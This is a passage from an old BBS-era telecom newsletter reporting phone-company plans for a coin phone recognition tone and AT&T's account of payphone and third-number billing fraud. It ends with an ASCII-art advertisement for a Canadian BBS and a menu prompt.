  2833. telephone companies to select numbers for these instruments out of the
  2834. general (non-coin) number pool. After first suggesting that every country in
  2835. the world first consult a database before processing any collect calls to the
  2836. United States, the interexchange carriers had a change of heart. The rest of
  2837. the world took a rather dim view of the United States imposing its will upon
  2838. everyone else end ignoring (as usual) the international standard. As a result,
  2839. it's now been suggested by American phone companies that the coin phone
  2840. recognition tone be implemented. Apart from everybody else in the world being
  2841. opposed to it, the disadvantages of relying upon the database included:
  2842. questions about database accuracy, the fact that training would be required,
  2843. the fact that validation would require two operators, and that there are no
  2844. contractual protections for any database failures. The companies also believe
  2845. such a tone will help cut down on fraud within the United States. AT&T says.
  2846. "Public and coin phones are very often the vehicle used by defrauders. Posing
  2847. es telephone company employers, fraud perpetrators convince consumers to
  2848. accept numerous bills to third calls and to give out their billing card PIN. A
  2849. signal such as the recognition tone, when nationally recognized by all US
  2850. subscribers as signifying a coin phone, could spell an end to scammars who
  2851. conduct business from payphones and leave coin phone numbers as a call back
  2852. number to their unsuspecting prey." The new system, including a voice message,
  2853. will be tested with Pacific Bell. BellSouth, however, believes that the
  2854. database system could still be used from oversees, provided the interexchange
  2855. carriers set up separate trunks to carry 0+ traffic and do the validation
  2856. themselves.
  2857.  
  2858.     Among the most common forms of third number billing fraud the phone
  2859. companies cite: "billing to voice mail, scams,  cellular  (to  and from),
  2860. international, billing to unassigned numbers, recorded acceptance messages,
  2861. database failures and inaccuracies, as well as no live verification."
  2862.  
  2863.     AT&T also stated, "With growing frequency, defrauders are establishing
  2864. telephone service end billing large numbers of calls to that service, with no
  2865. intention of paying the bill. This is often done by providing the LEC (local
  2866. company) with fraudulent information on the service application.'
  2867.  
  2868.     Other issues being discussed within the telco inner circle include
  2869. providing COCOTs with their own ANI and an apparent blue box type of fraud
  2870. involving US Sprint.
  2871.  
  2872.  
  2873.  
  2874.    +--------------------------------------------------------------&__.
  2875.    |               . F . O . R . B . I . D . D . E . N .             |
  2876.    |                        7                _ ______                |
  2877.    &            ___________ :    :_____________\___ ,\  _____ _      |
  2878.    |           /  _____   ,\&    ___    _________ ,\  \/    /        |
  2879.    |          /    _)_|     \    |/      |    __/  /  /    /         |
  2880.    :         /    /    \         |       |    |    ,\    _/          | 
  2881.    |        /   _/   _ /   \     |       |    |   _ /    |           |
  2882.    |        \_______ //    &\____&_______&____&__ //_____&-gEm-      |
  2883.    |                \/:    :                     \/                ._|
  2884.    |_.   .M.Y.S.T.I.C. .C.A.N.A.D.I.A.N. .H.E.A.D.Q.U.A.R.T.E.R.S. |. 
  2885.      |                                                              |
  2886.      |     n1: 416-287-2979! n2: 416-281-3912! n3: 416-281-4301!    |
  2887.      `--------------------------------------------------------------'          
  2888.   
  2889.  
  2890.  
  2891. REDLIGHT DISTRICT [1:AMiGA] Menu (57 mins. left):